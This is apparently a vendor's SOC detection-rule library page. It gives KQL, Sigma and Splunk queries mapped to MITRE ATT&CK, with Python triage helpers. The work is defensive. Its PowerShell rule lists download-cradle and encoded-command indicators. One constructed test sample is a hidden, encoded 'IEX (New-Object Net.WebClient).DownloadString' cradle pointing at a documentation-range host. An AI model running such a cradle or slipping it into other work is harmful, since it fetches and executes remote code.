PREMIUM

Detection Library

Battle-tested detection rules for real SOC environments. KQL, Sigma, and Splunk SPL, curated by practitioners and mapped to MITRE ATT&CK.

Every rule in this library is production-ready. Written by security operators, tested in real environments, and mapped to MITRE ATT&CK techniques. Copy, paste, detect.

Free rules are fully visible. Premium rules show only the description and metadata; unlock the full query with SCW Premium.


14 Detection Rules
3 Platforms
10 ATT&CK Categories

Detection Rules

Brute Force – Failed Logons Spike

FREE

T1110.001 – Brute Force: Password Guessing

Detects more than 10 failed sign-in attempts from a single IP within one 5-minute bin. Classic brute force indicator.

Severity: high | Platform: KQL (Sentinel)
Tags: brute-force, identity, SigninLogs
SigninLogs
| where ResultType != "0"          // "0" is a successful sign-in; any other code is a failure
| where isnotempty(IPAddress)
| summarize FailedCount = count() by IPAddress, bin(TimeGenerated, 5m)
| where FailedCount > 10
| project TimeGenerated, IPAddress, FailedCount
| order by FailedCount desc

💡 Note: Tune the threshold to your environment and exclude known VPN and proxy egress IPs. bin() produces fixed 5-minute buckets, so a burst that straddles a bin boundary is split in two and can stay under the threshold; lower the threshold or use a sliding window if that matters to you.
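The rule above counts failures per fixed 5-minute bin. The Python below is an added example, not code from the SCW library: it re-implements the rule's logic over a few constructed sign-in events so the threshold and the VPN exclusion can be exercised offline, and it shows the caveat that bin() hides, a burst straddling a bin boundary is split across two buckets and stays under the threshold, while a sliding window over the same events catches it. The addresses, timestamps, the 198.51.100.0/24 "VPN" range and the 50126 failure code are all made up for the example.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network


def _burst(ip, start, count, step_seconds, result_type="50126"):
    """Build `count` sign-in events from `ip` spaced `step_seconds` apart.
    50126 is a stand-in failure code for this example; "0" would mean success."""
    t0 = datetime.fromisoformat(start)
    return [(t0 + timedelta(seconds=i * step_seconds), ip, result_type) for i in range(count)]


# Constructed SigninLogs-style events: (TimeGenerated, IPAddress, ResultType).
SAMPLE_SIGNINS = sorted(
    # 12 failures from one address, six either side of the 09:05 bin boundary
    _burst("203.0.113.7", "2024-03-01T09:03:00+00:00", 6, 20)
    + _burst("203.0.113.7", "2024-03-01T09:05:10+00:00", 6, 20)
    # 15 rapid failures from a hypothetical corporate VPN egress address
    + _burst("198.51.100.20", "2024-03-01T10:00:00+00:00", 15, 5)
    # three typos followed by a success from an ordinary user
    + _burst("192.0.2.44", "2024-03-01T11:00:00+00:00", 3, 60)
    + [(datetime.fromisoformat("2024-03-01T11:04:00+00:00"), "192.0.2.44", "0")]
)

# Hypothetical allow-list standing in for the "known VPN IPs" the rule's note mentions.
KNOWN_VPN_CIDRS = [ip_network("198.51.100.0/24")]


def _is_failure(event, allow_list):
    """True for a failed sign-in from an address outside the allow-list."""
    _, ip, result_type = event
    if result_type == "0":
        return False
    return not any(ip_address(ip) in net for net in allow_list)


def tumbling_max_failures(events, bin_minutes=5, allow_list=KNOWN_VPN_CIDRS):
    """What the KQL does: count failures per IP per fixed bin (bin(TimeGenerated, 5m))
    and return the largest single-bin count seen for each IP."""
    per_bin = defaultdict(int)
    for ts, ip, result_type in events:
        if not _is_failure((ts, ip, result_type), allow_list):
            continue
        bin_start = ts.replace(minute=ts.minute - ts.minute % bin_minutes, second=0, microsecond=0)
        per_bin[(ip, bin_start)] += 1
    best = defaultdict(int)
    for (ip, _), n in per_bin.items():
        best[ip] = max(best[ip], n)
    return dict(best)


def sliding_max_failures(events, window=timedelta(minutes=5), allow_list=KNOWN_VPN_CIDRS):
    """Sliding-window variant: for each failure, count failures from the same IP
    in the preceding `window`. A burst that straddles a bin boundary is not split."""
    recent = defaultdict(deque)
    best = defaultdict(int)
    for ts, ip, result_type in sorted(events):
        if not _is_failure((ts, ip, result_type), allow_list):
            continue
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:
            q.popleft()
        best[ip] = max(best[ip], len(q))
    return dict(best)


def brute_force_alerts(events, threshold=10, sliding=True, allow_list=KNOWN_VPN_CIDRS):
    """Addresses exceeding the rule's threshold (FailedCount > 10)."""
    if sliding:
        counts = sliding_max_failures(events, allow_list=allow_list)
    else:
        counts = tumbling_max_failures(events, allow_list=allow_list)
    return sorted(ip for ip, n in counts.items() if n > threshold)


if __name__ == "__main__":
    print("per-bin maxima:", tumbling_max_failures(SAMPLE_SIGNINS))
    print("sliding maxima:", sliding_max_failures(SAMPLE_SIGNINS))
    print("alerts (tumbling):", brute_force_alerts(SAMPLE_SIGNINS, sliding=False))
    print("alerts (sliding): ", brute_force_alerts(SAMPLE_SIGNINS))
```

With the constructed data the tumbling version reports at most 6 failures per bin for 203.0.113.7 and raises nothing, while the sliding window sees all 12 within 3 minutes 50 seconds and alerts; dropping the allow-list makes the VPN address fire as well, which is the noise the note warns about.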

Suspicious PowerShell Execution

FREE

T1059.001 – Command and Scripting Interpreter: PowerShell

Flags PowerShell processes launched with encoded commands, download cradles, or execution-policy bypass flags, all common in the initial access and execution stages.

Severity: high | Platform: KQL (Sentinel)
Tags: powershell, execution, evasion
DeviceProcessEvents
| where FileName in~ ("powershell.exe", "pwsh.exe")   // case-insensitive; == would miss "PowerShell.exe"
| where ProcessCommandLine has_any (
    "-enc", "-encodedcommand", "bypass", "hidden",
    "downloadstring", "invoke-webrequest", "iex",
    "invoke-expression", "Net.WebClient"
  )
| project TimeGenerated, DeviceName, AccountName,
         ProcessCommandLine, InitiatingProcessFileName,
         InitiatingProcessCommandLine

💡 Note: High noise in dev environments, where "bypass" and "hidden" match ordinary build scripts. Combine with user risk score, and look at the parent process: PowerShell spawned by an Office application, a browser or a script host is a much stronger signal than a developer's own shell.
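Triage of a hit from this rule usually starts by decoding the -EncodedCommand blob, because the interesting indicators (the download cradle, IEX) are invisible in the raw command line. The Python below is an added example, not the library's code: it recognises the -e, -ec, -enc and -EncodedCommand spellings that powershell.exe accepts, decodes the base64-over-UTF-16LE payload, and matches the rule's indicator list against both the visible command line and the decoded script. The sample command lines, the script paths and the 198.51.100.5 download host are constructed for the example.

```python
import base64
import re

# Indicator list from the rule above, matched case-insensitively (as KQL has_any does).
INDICATORS = ["-enc", "-encodedcommand", "bypass", "hidden", "downloadstring",
              "invoke-webrequest", "iex", "invoke-expression", "net.webclient"]

# powershell.exe accepts -EncodedCommand as -e, -ec, -enc or any longer prefix of the
# parameter name; the pattern takes those forms and captures the base64 argument after
# them. -ExecutionPolicy begins "-ex", so it is not captured.
ENC_RE = re.compile(r"(?i)(?<!\S)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)")


def encode_for_powershell(script):
    """Produce the -EncodedCommand form of a script: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def split_encoded(cmdline):
    """Return (command line with the blob replaced by a placeholder, decoded script or None).
    Replacing the blob stops random base64 characters from matching short indicators like "iex"."""
    m = ENC_RE.search(cmdline)
    if not m:
        return cmdline, None
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        decoded = None   # malformed blob: keep the visible hits, report nothing decoded
    return cmdline[:m.start(1)] + "<base64>" + cmdline[m.end(1):], decoded


def triage(cmdline):
    """Indicators visible in the raw command line and those only visible after decoding."""
    visible, decoded = split_encoded(cmdline)
    raw_hits = [i for i in INDICATORS if i in visible.lower()]
    decoded_hits = [i for i in INDICATORS if decoded is not None and i in decoded.lower()]
    return {"raw": raw_hits, "decoded": decoded_hits, "decoded_command": decoded}


# Constructed samples: a hidden, encoded download cradle; a developer build script that
# trips the "bypass" indicator; and a benign scheduled inventory script.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.5/a.ps1')"
ENCODED_CRADLE = "powershell.exe -NoP -W Hidden -Enc " + encode_for_powershell(CRADLE)
DEV_BUILD = "pwsh.exe -ExecutionPolicy Bypass -File C:\\build\\run-tests.ps1"
BENIGN = "powershell.exe -NoProfile -File C:\\scripts\\inventory.ps1"

if __name__ == "__main__":
    for sample in (ENCODED_CRADLE, DEV_BUILD, BENIGN):
        print(triage(sample))
```

On the encoded sample the raw command line only shows "-enc" and "hidden"; the cradle, IEX and Net.WebClient appear solely in the decoded script, which is why an analyst (or an enrichment step in the pipeline) should decode before deciding the alert is noise.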

New Service Created via sc.exe

FREE

T1543.003 – Create or Modify System Process: Windows Service

Detects service creation using sc.exe, a common persistence mechanism used by attackers and malware.

Severity: medium | Platform: Sigma
Tags: persistence, service, sigma
title: New Service Created via sc.exe
status: experimental
description: Detects service creation via sc.exe, a common persistence mechanism used by attackers and malware.
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\sc.exe'
    CommandLine|contains: 'create'
  condition: selection
falsepositives:
  - Software deployment and management tools (SCCM, Intune)
  - Administrators installing services by hand
level: medium
tags:
  - attack.persistence
  - attack.t1543.003

💡 Note: Filter out known deployment tools (SCCM, Intune) to reduce false positives.

Outbound Data Transfer Spike

FREE

T1048 – Exfiltration Over Alternative Protocol

Identifies hosts that send more than a fixed volume of data to non-private addresses within an hour, a potential sign of exfiltration.

Severity: critical | Platform: KQL (Sentinel)
Tags: exfiltration, network, firewall
CommonSecurityLog
| where DeviceAction =~ "allow"                 // vendors log "Allow" or "allow"; =~ is case-insensitive
| where not(ipv4_is_private(DestinationIP))    // excludes every RFC 1918 range, not just 10/8 and 192.168/16
| summarize TotalBytes = sum(SentBytes) by SourceIP, bin(TimeGenerated, 1h)
| where TotalBytes > 500000000
| project TimeGenerated, SourceIP, TotalBytesMB = TotalBytes / 1048576
| order by TotalBytesMB desc

💡 Note: 500 MB per source per hour is a starting threshold; adjust it to your baseline and exclude known backup, update and mail relay servers. Make sure the private-address exclusion covers all RFC 1918 ranges (10/8, 172.16/12, 192.168/16), otherwise internal transfers to 172.16.0.0/12 show up as "outbound".

Azure AD Impossible Travel

FREE

T1078 – Valid Accounts

Detects successful sign-ins for one account from more than one country inside a 30-minute window, a common sign of compromised credentials.

Severity: high | Platform: KQL (Sentinel)
Tags: impossible-travel, identity, azure-ad
SigninLogs
| where ResultType == "0"
| extend City = tostring(LocationDetails.city),
         Country = tostring(LocationDetails.countryOrRegion)
| where isnotempty(Country)                      // sign-ins with no geolocation would otherwise count as a location
| summarize Locations = make_set(Country),
            Cities = make_set(City),
            IPs = make_set(IPAddress),
            Count = count()
            by UserPrincipalName, bin(TimeGenerated, 30m)
| where array_length(Locations) > 1
| project TimeGenerated, UserPrincipalName, Locations, Cities, IPs, Count

💡 Note: Enrich with VPN/proxy IP lists to reduce false positives from corporate VPN. Two countries in one 30-minute bin is a coarse proxy for impossible travel: it fires for legitimate sign-ins near a border (France, then Belgium) and misses any pair of sign-ins that land in different bins, however far apart they are. For a tighter rule, compare each user's consecutive sign-ins by distance and elapsed time.
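The comparison the note calls for, consecutive sign-ins per user scored by great-circle distance over elapsed time, as an added Python example that is not part of the library. It assumes the sign-in coordinates are available (SigninLogs exposes them under LocationDetails.geoCoordinates); the users, addresses, timestamps and the 198.51.100.0/24 "VPN egress" range are constructed, and the 900 km/h speed ceiling and 500 km distance floor are example thresholds to tune.

```python
import math
from collections import defaultdict
from datetime import datetime
from ipaddress import ip_address, ip_network

# Constructed successful sign-ins (ResultType "0" already applied), one row per event:
# (TimeGenerated, UserPrincipalName, IPAddress, countryOrRegion, latitude, longitude).
SAMPLE_SIGNINS = [
    ("2024-03-01T09:00:00", "alice@example.com", "203.0.113.10",  "GB", 51.5074, -0.1278),    # London
    ("2024-03-01T09:40:00", "alice@example.com", "203.0.113.99",  "AU", -33.8688, 151.2093),  # Sydney
    ("2024-03-01T09:00:00", "bob@example.com",   "192.0.2.10",    "FR", 48.8566, 2.3522),     # Paris
    ("2024-03-01T09:50:00", "bob@example.com",   "192.0.2.11",    "BE", 50.8503, 4.3517),     # Brussels
    ("2024-03-01T09:00:00", "carol@example.com", "192.0.2.20",    "DE", 52.5200, 13.4050),    # Berlin
    ("2024-03-01T09:05:00", "carol@example.com", "198.51.100.20", "US", 40.7128, -74.0060),   # VPN egress
    ("2024-03-01T08:00:00", "dave@example.com",  "192.0.2.30",    "DE", 52.5200, 13.4050),    # Berlin
    ("2024-03-01T12:00:00", "dave@example.com",  "203.0.113.50",  "US", 40.7128, -74.0060),   # New York
]

# Hypothetical corporate VPN egress range: sign-ins from it geolocate to the VPN, not the user.
TRUSTED_EGRESS = ["198.51.100.0/24"]


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance in kilometres between two latitude/longitude points."""
    r = 6371.0
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = math.radians(lat2 - lat1)
    dlam = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlam / 2) ** 2
    return 2 * r * math.asin(math.sqrt(a))


def impossible_travel(events, max_speed_kmh=900.0, min_distance_km=500.0, trusted_cidrs=()):
    """Compare each user's consecutive sign-ins and flag pairs whose implied speed exceeds
    max_speed_kmh. Unlike a fixed 30-minute bin this works across any time gap, and the
    distance floor keeps neighbouring-country sign-ins (Paris, then Brussels) from firing."""
    nets = [ip_network(c) for c in trusted_cidrs]
    by_user = defaultdict(list)
    for ts, upn, ip, country, lat, lon in events:
        if any(ip_address(ip) in n for n in nets):
            continue   # VPN/proxy egress: location says nothing about where the user is
        by_user[upn].append((datetime.fromisoformat(ts), ip, country, lat, lon))
    alerts = []
    for upn, rows in by_user.items():
        rows.sort()
        for (t1, ip1, c1, la1, lo1), (t2, ip2, c2, la2, lo2) in zip(rows, rows[1:]):
            km = haversine_km(la1, lo1, la2, lo2)
            if km < min_distance_km:
                continue
            hours = (t2 - t1).total_seconds() / 3600
            kmh = km / hours if hours > 0 else float("inf")   # same timestamp, far apart: flag it
            if kmh > max_speed_kmh:
                alerts.append({"user": upn, "from": f"{c1} {ip1}", "to": f"{c2} {ip2}",
                               "km": round(km), "kmh": round(kmh) if math.isfinite(kmh) else None})
    return alerts


if __name__ == "__main__":
    for alert in impossible_travel(SAMPLE_SIGNINS, trusted_cidrs=TRUSTED_EGRESS):
        print(alert)
```

With the constructed data this flags alice (London to Sydney in 40 minutes) and dave (Berlin to New York in four hours, which the 30-minute bin rule would never see), ignores bob's Paris-to-Brussels pair that the bin rule would have raised, and drops carol's VPN sign-in entirely; remove the trusted range and carol fires too.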

Ransomware – Mass File Encryption Pattern

🔒 PRO

T1486 – Data Encrypted for Impact

Detects rapid file rename operations with known ransomware extensions, indicating that encryption is in progress.

Severity: critical | Platform: KQL (Sentinel)
Tags: ransomware, encryption, file-events
🔒 Unlock with SCW Premium

DeviceFileEvents
| where ActionType == "FileRenamed"
| where FileName has_any...

💡 Note: Critical severity: trigger immediate SOC escalation. Pair with network isolation automation.

Lateral Movement – PsExec Remote Execution

🔒 PRO

T1021.002 – Remote Services: SMB/Windows Admin Shares

Detects PsExec-style remote service creation, one of the most common lateral movement techniques seen in enterprise breaches.

Severity: high | Platform: KQL (Sentinel)
Tags: lateral-movement, psexec, smb
🔒 Unlock with SCW Premium

DeviceProcessEvents
| where InitiatingProcessFileName in~ ("psexec.exe","psex...

💡 Note: High confidence. PsExec in production is almost always suspicious. Whitelist IT tooling explicitly.

Privilege Escalation – Token Manipulation

🔒 PRO

T1134.001 – Access Token Manipulation: Token Impersonation

Detects access token impersonation techniques commonly used to escalate from user to SYSTEM.

Severity: high | Platform: Sigma
Tags: privilege-escalation, token, potato
🔒 Unlock with SCW Premium

title: Token Impersonation via Known Tools
status: experimental
logsource:
  ...

💡 Note: Near-zero false positive rate. Detection of these tools almost always indicates compromise.

Phishing – OAuth Consent Grant Attack

🔒 PRO

T1528 – Steal Application Access Token

Detects when a user grants consent to a suspicious OAuth application, a common technique in modern phishing campaigns.

Severity: critical | Platform: KQL (Sentinel)
Tags: phishing, oauth, consent-grant
🔒 Unlock with SCW Premium

AuditLogs
| where OperationName == "Consent to application"
| extend AppName ...

💡 Note: Critical: a consented application can hold mailbox-wide permissions, and its access is not removed by a password reset. Investigate immediately and revoke the grant if unauthorized.

Cloud – S3 Bucket Made Public

🔒 PRO

T1530 – Data from Cloud Storage

Detects when an S3 bucket ACL is changed to public, an immediate data exposure risk.

Severity: critical | Platform: Splunk SPL
Tags: cloud, aws, s3, public-exposure
🔒 Unlock with SCW Premium

index=aws sourcetype=aws:cloudtrail
  eventName=PutBucketAcl OR eventName=Put...

💡 Note: Immediate response required. Auto-remediate with Lambda if possible, and enable S3 Block Public Access at the account level so an ACL change cannot expose data in the first place.

Credential Dumping – LSASS Access

🔒 PRO

T1003.001 – OS Credential Dumping: LSASS Memory

Detects processes accessing LSASS memory, the primary technique for credential harvesting on Windows.

Severity: critical | Platform: KQL (Sentinel)
Tags: credential-dumping, lsass, mimikatz
🔒 Unlock with SCW Premium

DeviceProcessEvents
| where FileName in~ ("mimikatz.exe","procdump.exe",
    ...

💡 Note: High confidence. Any LSASS access outside of AV/EDR is suspicious. Trigger immediate investigation. Matching on tool file names is defeated by renaming the binary, so pair this with handle-open telemetry against lsass.exe where your EDR exposes it (in Defender for Endpoint, DeviceEvents with ActionType "OpenProcessApiCall").

Defense Evasion – Disable Windows Defender

🔒 PRO

T1562.001 – Impair Defenses: Disable or Modify Tools

Detects attempts to disable or tamper with Windows Defender via PowerShell, registry, or Group Policy.

Severity: high | Platform: KQL (Sentinel)
Tags: evasion, defender, antivirus
🔒 Unlock with SCW Premium

DeviceProcessEvents
| where ProcessCommandLine has_any (
    "Set-MpPreferenc...

💡 Note: Almost always malicious unless done by authorized IT during maintenance windows.

Lateral Movement – RDP from Unusual Source

🔒 PRO

T1021.001 – Remote Services: Remote Desktop Protocol

Detects RDP connections from internal hosts that don't normally initiate RDP, a sign of potential lateral movement.

Severity: medium | Platform: Splunk SPL
Tags: lateral-movement, rdp, logon
🔒 Unlock with SCW Premium

index=windows EventCode=4624 LogonType=10
| stats count by src_ip, dest, Acco...

💡 Note: Requires building an RDP baseline lookup first. High value once the baseline is established.

Persistence – Scheduled Task via schtasks

🔒 PRO

T1053.005 – Scheduled Task/Job: Scheduled Task

Detects creation of scheduled tasks via the command line, a persistence technique common across all threat actors.

Severity: medium | Platform: Sigma
Tags: persistence, scheduled-task, sigma
🔒 Unlock with SCW Premium

title: Scheduled Task Creation via schtasks.exe
status: stable
logsource:
  c...

💡 Note: Filter SYSTEM-created tasks to reduce noise. Focus on tasks created by regular user accounts.


Unlock the full Detection Library.

Get access to all 14 detection rules: production-ready queries you can deploy today across KQL, Sigma, and Splunk SPL.